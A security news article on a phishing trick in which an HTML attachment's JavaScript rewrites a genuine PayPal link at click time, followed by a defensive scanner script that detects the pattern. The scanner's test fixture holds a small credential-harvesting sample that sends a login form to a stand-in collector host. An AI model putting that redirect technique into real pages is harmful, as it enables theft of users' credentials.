New JavaScript Redirect Takes Phishing to a New Level

If cyber criminals get smart about their mode of operation, hovering over links to check their actual destination may soon turn out to be a useless security tip

Normally, phishing emails contain links which redirect users to Web pages created to look like the real service they’re imitating.
PC users have always been instructed to hover over the links in the emails they receive, or over the buttons on a suspicious page, to check whether a link really leads back to the trusted domain or only to a look-alike URL.

Recently, a security expert known as @dvk01uk, owner of the “My Online Security” blog, has found a brand new phishing trick.

The expert claims that he spotted a phishing email which contained an HTML page attachment. After opening the page in his browser, the website loaded from a local client-side URL; however, another detail attracted his attention.

Hovering the “Submit” button showed an authentic PayPal URL, which made no sense. Why would a phisher go through all this effort to deliver a non-functional page that delivered phished credentials to the real PayPal website?

The expert found his answer in the JavaScript files loaded by this phishing page, which contained code that hijacked user clicks. Apparently, the malicious JS code was set to replace any request to paypal.com with the malicious phishing URL right after the user clicked the link. Hovering over the button revealed nothing, because the browser showed the genuine PayPal link.

The phisher’s only mistake was to deliver this HTML file as a downloadable page. This is something that should ring thousands of alarm bells with any user, since Web services never send you a copy of their Web pages, but ask you to visit their websites.

According to My Online Security, “Now if the phishers were intelligent enough to put this on a website with a half believable URL, something like http://paypalnew.com which was used in a series of Phishing attacks yesterday, we would be in trouble, because users wouldn’t realize that they were giving their details to a phisher.”

The problem is that if you can’t read JavaScript code, it will be very difficult for you to recognize this phishing trick if it ever gets implemented by a smarter hacker.
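The reason the hover check fails here is that the tooltip only shows the static href or form action as it stands at that moment, while the script changes the destination at click or submit time. A mail gateway or a curious user can instead look at the attachment itself: links or forms whose static target sits on a trusted domain, combined with inline script that hooks click/submit events and rewrites a target, is exactly the combination described above. The scanner below is an added example written for this article, not code from the original post or from My Online Security; the brand list, the regular expressions and both sample pages are assumptions constructed for the illustration.

```javascript
// Added example: heuristic scan of an HTML e-mail attachment for the
// "hover shows the real site, script redirects on click" pattern.
// Brand list, regexes and sample pages are assumptions made for this
// illustration; none of it comes from the article or My Online Security.

const TRUSTED_BRANDS = ['paypal.com']; // domains a phish is likely to imitate

// Script fragments that change where a link or form actually goes.
const REWRITE_PATTERNS = [
  /\.href\s*=[^=]/i,
  /\.action\s*=[^=]/i,
  /\blocation(?:\.href)?\s*=[^=]/i,
  /\bwindow\.open\s*\(/i,
];

// Script fragments that hook the moment the user clicks or submits.
const CLICK_HOOK_PATTERNS = [
  /addEventListener\s*\(\s*['"](?:click|mousedown|submit)['"]/i,
  /\bon(?:click|mousedown|submit)\s*=/i,
];

// Pull the bodies of all inline <script> blocks out of the page.
function extractScripts(html) {
  const scripts = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) scripts.push(m[1]);
  return scripts;
}

// Collect the static href= / action= values of anchors and forms,
// i.e. exactly what a hover tooltip would show the user.
function extractLinkTargets(html) {
  const targets = [];
  const re = /<(?:a|area|form)\b[^>]*\b(?:href|action)\s*=\s*["']([^"']+)["']/gi;
  let m;
  while ((m = re.exec(html)) !== null) targets.push(m[1]);
  return targets;
}

function hostOf(url) {
  try {
    return new URL(url).hostname.toLowerCase();
  } catch (_) {
    return null; // relative or malformed target
  }
}

// Exact match or a subdomain of a trusted brand; "paypal.com.evil.invalid" fails.
function isTrustedHost(host) {
  return TRUSTED_BRANDS.some((b) => host === b || host.endsWith('.' + b));
}

function analyzeAttachment(html) {
  const script = extractScripts(html).join('\n');
  const trustedTargets = extractLinkTargets(html).filter((t) => {
    const h = hostOf(t);
    return h !== null && isTrustedHost(h);
  });
  const hasClickHook = CLICK_HOOK_PATTERNS.some((p) => p.test(script));
  const hasRewrite = REWRITE_PATTERNS.some((p) => p.test(script));
  const hasPasswordField = /<input\b[^>]*type\s*=\s*["']password["']/i.test(html);

  const findings = [];
  if (hasPasswordField) {
    findings.push('password field inside a locally opened HTML attachment');
  }
  if (trustedTargets.length > 0 && hasClickHook && hasRewrite) {
    findings.push('trusted-domain link/form target plus script rewriting the target on click/submit');
  }
  return { suspicious: findings.length > 0, findings, trustedTargets };
}

// Constructed sample: the behaviour the article describes, reduced to a few lines.
const SAMPLE_ATTACHMENT = `<html><body>
<form id="login" action="https://www.paypal.com/signin">
  <input name="email"> <input name="pass" type="password">
  <button type="submit">Submit</button>
</form>
<script>
  document.getElementById('login').addEventListener('submit', function () {
    this.action = 'http://phish-collector.invalid/post';
  });
</script>
</body></html>`;

// Constructed benign page: a genuine link and no script at all.
const BENIGN_PAGE = `<html><body>
<a href="https://www.paypal.com/">Log in at PayPal</a>
</body></html>`;

for (const [name, page] of [['attachment', SAMPLE_ATTACHMENT], ['benign', BENIGN_PAGE]]) {
  const r = analyzeAttachment(page);
  console.log(name, r.suspicious ? 'SUSPICIOUS' : 'ok', r.findings);
}
```

The check deliberately requires all three signals together (trusted static target, a click/submit hook, and a target rewrite) before raising the redirect finding, so an ordinary page that merely links to PayPal is not flagged; the password-field finding fires on its own because, as the article notes, a legitimate service never sends its login page as a file.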
